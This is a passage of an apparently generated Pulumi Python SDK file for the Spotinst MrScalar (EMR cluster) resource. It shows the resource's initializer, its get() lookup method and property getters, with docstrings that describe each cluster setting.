instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Implementation backing both ``__init__`` overloads: builds the property
bag and registers the MrScaler resource with the Pulumi engine.

Not part of the public API; ``__init__`` forwards here after normalizing
its arguments. ``__props__`` is reserved for the ``get()`` flow, which
supplies a pre-built property bag together with an existing ``opts.id``.
"""
# Normalize resource options: default them when absent, reject wrong types,
# and pin the provider plugin version when the caller did not set one.
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
# No opts.id means we are creating a new resource, so the full property
# bag must be assembled here from the individual arguments.
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MrScalarArgs.__new__(MrScalarArgs)
__props__.__dict__["additional_info"] = additional_info
__props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
__props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
__props__.__dict__["applications"] = applications
__props__.__dict__["availability_zones"] = availability_zones
__props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["configurations_files"] = configurations_files
__props__.__dict__["core_desired_capacity"] = core_desired_capacity
__props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
__props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
__props__.__dict__["core_instance_types"] = core_instance_types
__props__.__dict__["core_lifecycle"] = core_lifecycle
__props__.__dict__["core_max_size"] = core_max_size
__props__.__dict__["core_min_size"] = core_min_size
__props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
__props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
__props__.__dict__["core_unit"] = core_unit
__props__.__dict__["custom_ami_id"] = custom_ami_id
__props__.__dict__["description"] = description
__props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
__props__.__dict__["ec2_key_name"] = ec2_key_name
__props__.__dict__["expose_cluster_id"] = expose_cluster_id
__props__.__dict__["instance_weights"] = instance_weights
__props__.__dict__["job_flow_role"] = job_flow_role
__props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
__props__.__dict__["log_uri"] = log_uri
__props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
__props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
__props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
__props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
__props__.__dict__["master_instance_types"] = master_instance_types
__props__.__dict__["master_lifecycle"] = master_lifecycle
__props__.__dict__["master_target"] = master_target
__props__.__dict__["name"] = name
__props__.__dict__["provisioning_timeout"] = provisioning_timeout
__props__.__dict__["region"] = region
__props__.__dict__["release_label"] = release_label
__props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
__props__.__dict__["retries"] = retries
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
__props__.__dict__["security_config"] = security_config
__props__.__dict__["service_access_security_group"] = service_access_security_group
__props__.__dict__["service_role"] = service_role
__props__.__dict__["steps_files"] = steps_files
# 'strategy' is the only required input here; the check is skipped when
# rehydrating the resource from an existing URN.
if strategy is None and not opts.urn:
raise TypeError("Missing required property 'strategy'")
__props__.__dict__["strategy"] = strategy
__props__.__dict__["tags"] = tags
__props__.__dict__["task_desired_capacity"] = task_desired_capacity
__props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
__props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
__props__.__dict__["task_instance_types"] = task_instance_types
__props__.__dict__["task_lifecycle"] = task_lifecycle
__props__.__dict__["task_max_size"] = task_max_size
__props__.__dict__["task_min_size"] = task_min_size
__props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
__props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
__props__.__dict__["task_unit"] = task_unit
__props__.__dict__["termination_policies"] = termination_policies
__props__.__dict__["termination_protected"] = termination_protected
# Deprecated field: warn only for fresh resources, not when reading state.
if visible_to_all_users is not None and not opts.urn:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
__props__.__dict__["visible_to_all_users"] = visible_to_all_users
# Output-only property; the provider populates it after creation.
__props__.__dict__["output_cluster_id"] = None
# Register the resource with the engine under the provider's type token.
super(MrScalar, __self__).__init__(
'spotinst:aws/mrScalar:MrScalar',
resource_name,
__props__,
opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            additional_info: Optional[pulumi.Input[str]] = None,
            additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
            availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
            cluster_id: Optional[pulumi.Input[str]] = None,
            configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
            core_desired_capacity: Optional[pulumi.Input[int]] = None,
            core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
            core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
            core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            core_lifecycle: Optional[pulumi.Input[str]] = None,
            core_max_size: Optional[pulumi.Input[int]] = None,
            core_min_size: Optional[pulumi.Input[int]] = None,
            core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
            core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
            core_unit: Optional[pulumi.Input[str]] = None,
            custom_ami_id: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
            ec2_key_name: Optional[pulumi.Input[str]] = None,
            expose_cluster_id: Optional[pulumi.Input[bool]] = None,
            instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
            job_flow_role: Optional[pulumi.Input[str]] = None,
            keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
            log_uri: Optional[pulumi.Input[str]] = None,
            managed_primary_security_group: Optional[pulumi.Input[str]] = None,
            managed_replica_security_group: Optional[pulumi.Input[str]] = None,
            master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
            master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
            master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            master_lifecycle: Optional[pulumi.Input[str]] = None,
            master_target: Optional[pulumi.Input[int]] = None,
            name: Optional[pulumi.Input[str]] = None,
            output_cluster_id: Optional[pulumi.Input[str]] = None,
            provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
            region: Optional[pulumi.Input[str]] = None,
            release_label: Optional[pulumi.Input[str]] = None,
            repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
            retries: Optional[pulumi.Input[int]] = None,
            scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
            security_config: Optional[pulumi.Input[str]] = None,
            service_access_security_group: Optional[pulumi.Input[str]] = None,
            service_role: Optional[pulumi.Input[str]] = None,
            steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
            strategy: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
            task_desired_capacity: Optional[pulumi.Input[int]] = None,
            task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
            task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
            task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            task_lifecycle: Optional[pulumi.Input[str]] = None,
            task_max_size: Optional[pulumi.Input[int]] = None,
            task_min_size: Optional[pulumi.Input[int]] = None,
            task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
            task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
            task_unit: Optional[pulumi.Input[str]] = None,
            termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
            termination_protected: Optional[pulumi.Input[bool]] = None,
            visible_to_all_users: Optional[pulumi.Input[bool]] = None) -> 'MrScalar':
        """
        Get an existing MrScalar resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
        :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[str] cluster_id: The MrScaler cluster id.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
        :param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
        :param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
        :param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]] core_scaling_down_policies: Scaling-down policies for the core group (NOTE(review): description inferred from the name; confirm against provider docs).
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]] core_scaling_up_policies: Scaling-up policies for the core group (NOTE(review): description inferred from the name; confirm against provider docs).
        :param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
        :param pulumi.Input[str] description: The MrScaler description.
        :param pulumi.Input[int] ebs_root_volume_size: Size of the EBS root volume (NOTE(review): units inferred from the name, presumably GiB; confirm against provider docs).
        :param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
        :param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
        :param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
        :param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
        :param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
        :param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
        :param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
        :param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
        :param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] master_target: Number of instances in the master group.
        :param pulumi.Input[str] name: The application name.
        :param pulumi.Input[str] output_cluster_id: The cluster id made available as an output (see `expose_cluster_id`).
        :param pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']] provisioning_timeout: Provisioning timeout configuration (see also `retries`, which applies when this timeout is exceeded).
        :param pulumi.Input[str] region: The MrScaler region.
        :param pulumi.Input[str] release_label: The EMR release label (NOTE(review): description inferred from the name; confirm against provider docs).
        :param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
        :param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
        :param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
        :param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
        :param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
        :param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
        :param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
        :param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
        :param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
        :param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]] task_scaling_down_policies: Scaling-down policies for the task group (NOTE(review): description inferred from the name; confirm against provider docs).
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]] task_scaling_up_policies: Scaling-up policies for the task group (NOTE(review): description inferred from the name; confirm against provider docs).
        :param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
        :param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
        :param pulumi.Input[bool] visible_to_all_users: Deprecated. This field has been removed from the API and is no longer functional.
        """
        # Binding the supplied id makes the engine look up existing state instead of creating a new resource.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # __new__ bypasses _MrScalarState.__init__ on purpose: every field is populated
        # directly below from the lookup arguments (None means "not qualified").
        __props__ = _MrScalarState.__new__(_MrScalarState)

        __props__.__dict__["additional_info"] = additional_info
        __props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
        __props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
        __props__.__dict__["applications"] = applications
        __props__.__dict__["availability_zones"] = availability_zones
        __props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
        __props__.__dict__["cluster_id"] = cluster_id
        __props__.__dict__["configurations_files"] = configurations_files
        __props__.__dict__["core_desired_capacity"] = core_desired_capacity
        __props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
        __props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
        __props__.__dict__["core_instance_types"] = core_instance_types
        __props__.__dict__["core_lifecycle"] = core_lifecycle
        __props__.__dict__["core_max_size"] = core_max_size
        __props__.__dict__["core_min_size"] = core_min_size
        __props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
        __props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
        __props__.__dict__["core_unit"] = core_unit
        __props__.__dict__["custom_ami_id"] = custom_ami_id
        __props__.__dict__["description"] = description
        __props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
        __props__.__dict__["ec2_key_name"] = ec2_key_name
        __props__.__dict__["expose_cluster_id"] = expose_cluster_id
        __props__.__dict__["instance_weights"] = instance_weights
        __props__.__dict__["job_flow_role"] = job_flow_role
        __props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
        __props__.__dict__["log_uri"] = log_uri
        __props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
        __props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
        __props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
        __props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
        __props__.__dict__["master_instance_types"] = master_instance_types
        __props__.__dict__["master_lifecycle"] = master_lifecycle
        __props__.__dict__["master_target"] = master_target
        __props__.__dict__["name"] = name
        __props__.__dict__["output_cluster_id"] = output_cluster_id
        __props__.__dict__["provisioning_timeout"] = provisioning_timeout
        __props__.__dict__["region"] = region
        __props__.__dict__["release_label"] = release_label
        __props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
        __props__.__dict__["retries"] = retries
        __props__.__dict__["scheduled_tasks"] = scheduled_tasks
        __props__.__dict__["security_config"] = security_config
        __props__.__dict__["service_access_security_group"] = service_access_security_group
        __props__.__dict__["service_role"] = service_role
        __props__.__dict__["steps_files"] = steps_files
        __props__.__dict__["strategy"] = strategy
        __props__.__dict__["tags"] = tags
        __props__.__dict__["task_desired_capacity"] = task_desired_capacity
        __props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
        __props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
        __props__.__dict__["task_instance_types"] = task_instance_types
        __props__.__dict__["task_lifecycle"] = task_lifecycle
        __props__.__dict__["task_max_size"] = task_max_size
        __props__.__dict__["task_min_size"] = task_min_size
        __props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
        __props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
        __props__.__dict__["task_unit"] = task_unit
        __props__.__dict__["termination_policies"] = termination_policies
        __props__.__dict__["termination_protected"] = termination_protected
        __props__.__dict__["visible_to_all_users"] = visible_to_all_users
        return MrScalar(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> pulumi.Output[Optional[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@property
@pulumi.getter
def applications(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarApplication']]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarBootstrapActionsFile']]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarConfigurationsFile']]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> pulumi.Output[Optional[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreEbsBlockDevice']]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> pulumi.Output[Optional[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> pulumi.Output[Optional[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
    @property
    @pulumi.getter(name="coreScalingDownPolicies")
    def core_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingDownPolicy']]]:
        """
        Scaling-down policies for the core group. NOTE(review): description inferred from the name; confirm against provider docs.
        """
        return pulumi.get(self, "core_scaling_down_policies")
    @property
    @pulumi.getter(name="coreScalingUpPolicies")
    def core_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingUpPolicy']]]:
        """
        Scaling-up policies for the core group. NOTE(review): description inferred from the name; confirm against provider docs.
        """
        return pulumi.get(self, "core_scaling_up_policies")
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> pulumi.Output[Optional[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="ebsRootVolumeSize")
    def ebs_root_volume_size(self) -> pulumi.Output[Optional[int]]:
        """
        Size of the EBS root volume. NOTE(review): units inferred from the name, presumably GiB; confirm against provider docs.
        """
        return pulumi.get(self, "ebs_root_volume_size")
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> pulumi.Output[Optional[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarInstanceWeight']]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
